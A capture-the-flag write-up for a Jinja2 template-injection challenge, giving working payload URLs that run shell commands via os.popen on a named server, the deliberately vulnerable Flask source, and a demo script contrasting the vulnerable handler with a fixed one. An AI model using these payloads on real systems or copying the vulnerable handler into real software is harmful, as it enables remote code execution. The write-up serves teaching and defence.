Arena Web1: Easy Injection
Difficulty: easy
Topic: Python server-side template injection (Jinja2 SSTI)
A textbook template injection with no filtering at all. The 404 handler splices the requested URL into the template source with `%` before it is rendered, so any `{{ ... }}` in the path is evaluated by Jinja2. `config` is part of Flask's default template context, and its class's `__init__` is defined in `flask.config`, a module that imports `os`, so the usual attribute chain reaches `os.popen`. Because the handler runs `urllib.parse.unquote` on `request.url`, the braces can also be sent percent-encoded. Payloads, one per request:
http://101.201.126.95:7050/{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
http://101.201.126.95:7050/{{ config.__class__.__init__.__globals__['os'].popen('cat flog').read() }}
Challenge source:
#encoding:utf-8
from flask import Flask, request, render_template_string
import urllib.request, urllib.parse

app = Flask(__name__)


@app.route("/")
def hello():
    return "python template injection"


@app.errorhandler(404)
def page_not_found(error):
    # Vulnerable by design: the decoded URL becomes part of the template
    # *source*, so Jinja2 evaluates any {{ ... }} the client puts in the path.
    url = urllib.parse.unquote(request.url)
    return render_template_string("<h1>URL %s not found</h1><br/>" % url), 404


if __name__ == '__main__':
    # debug=False: no Werkzeug debugger, the only bug is the template injection.
    app.run(debug=False, host='0.0.0.0', port=80)
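The following is an added example, not part of the challenge or the writeup. It reproduces the vulnerable handler and a fixed one with Jinja2 alone (no Flask, so the verifier can run it), builds the percent-encoded attack URL, and shows why the payload works: the stand-in `Config` class is an assumption that mirrors the one property of `flask.config.Config` that matters here, namely that its `__init__` is a plain Python function whose `__globals__` belong to a module that imports `os`. Host and command strings are constructed for the demo.

```python
import os  # needed: the __globals__ reached by the payload are this module's
from urllib.parse import quote, unquote

from jinja2 import Environment, Template


class Config(dict):
    """Assumed stand-in for flask.config.Config.

    flask.config defines Config.__init__ as an ordinary function in a module
    that does `import os`, so config.__class__.__init__.__globals__['os'] is
    the os module.  This class has exactly that property and nothing else."""

    def __init__(self, defaults=None):
        super().__init__(defaults or {})


config = Config({"DEBUG": False})  # what Flask exposes to templates as `config`


def ssti_payload(cmd: str) -> str:
    """The attribute chain used in the writeup, with cmd run via os.popen."""
    return "{{config.__class__.__init__.__globals__['os'].popen(%r).read()}}" % cmd


def attack_url(base: str, cmd: str) -> str:
    """Percent-encode the payload for the path.  The vulnerable handler calls
    unquote() on request.url, so the braces and quotes come back intact."""
    return base.rstrip("/") + "/" + quote(ssti_payload(cmd), safe="")


def vulnerable_404(request_url: str) -> str:
    """Mirrors the challenge: the decoded URL is spliced into the template
    source with %, then compiled and rendered by Jinja2."""
    url = unquote(request_url)
    return Template("<h1>URL %s not found</h1><br/>" % url).render(config=config)


# Fix: keep the template source constant and pass the URL in as data.
# autoescape=True additionally neutralises reflected HTML in the path.
_safe_env = Environment(autoescape=True)
_not_found = _safe_env.from_string("<h1>URL {{ url }} not found</h1><br/>")


def hardened_404(request_url: str) -> str:
    """Same context (config still present), but the URL is never parsed."""
    return _not_found.render(config=config, url=unquote(request_url))


if __name__ == "__main__":
    url = attack_url("http://101.201.126.95:7050", "echo ssti")
    print(url)
    print("vulnerable:", vulnerable_404(url))
    print("hardened:  ", hardened_404(url))
```

Run it once and compare the two outputs: the vulnerable handler returns the command's output inside the `<h1>`, while the hardened one echoes the payload back as inert text. In the real application the equivalent fix is `render_template_string("<h1>URL {{ url }} not found</h1><br/>", url=url)`.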